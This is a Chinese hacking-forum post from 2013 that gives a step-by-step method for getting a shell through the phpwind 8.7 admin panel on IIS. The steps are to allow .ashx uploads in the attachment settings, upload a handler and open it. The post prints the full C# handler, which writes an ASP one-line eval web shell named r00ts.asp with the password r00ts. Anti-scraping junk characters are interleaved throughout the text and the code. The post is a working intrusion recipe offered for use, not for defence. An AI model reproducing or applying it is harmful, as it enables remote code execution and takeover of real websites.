找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2629|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
' m4 A# H& B; [. d' f- d $ E9 w( X. ^5 d; I; y
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
0 b( T* N2 W6 i6 w& V2 O! Z4 Z( P4 V2 X- l ; U3 h( K! |: g
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整4 X' E/ A- S1 H

& T" L6 g: D+ A6 b" z& H, [; Q然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
- @* F! _. C9 o1 R- l . R( i) [7 w4 S7 T
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts" F# s' d. c! T" N, q
5 h3 L) W2 T1 c% N2 q4 D# d" |
下面是代码:: n9 e0 s* O! f% c8 e+ @8 T
" @! H- D: h! @1 g( l! ?
<%@ WebHandler Language="C#"Class="Handler" %>
8 S. c  c6 P7 ]- m2 _using System;% _" ~. H# ^7 d8 [- K' `
using System.Web;
: ]: V/ x8 e( b& Yusing System.IO;
. G0 X, m3 _) @( z3 qpublic class Handler : IHttpHandler {
( g+ X( F& Q! q9 G% Hpublic void ProcessRequest (HttpContext context) {: b$ {1 _5 i& x& Q9 `! n
context.Response.ContentType = "text/plain";
- E% K9 U0 r1 F/ r! w7 @StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));# D$ z; e1 L& g- E% i
file1.Write("<%eval request(\"r00ts\")%>");
1 W2 o2 m' }# X+ z+ sfile1.Flush();
1 i* B* O1 ~6 E$ b5 @, _# T( L& vfile1.Close();
, z. T: r5 K. c7 d/ n5 z% N" N3 E% C}5 M$ J+ k. `. V4 {2 K
public bool IsReusable {2 V8 Y0 b/ R& O
get {8 E& q1 W* J4 ^& m5 u" L% Y
return false;
% U, O$ C/ Y& e1 A" L0 ~7 d}( {" a1 P5 S  e* p
}
" L, j) D9 b8 a+ ^$ c" ?2 b- X: u}% ~" E0 j, K5 f6 L7 X! E% x2 X: t- J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表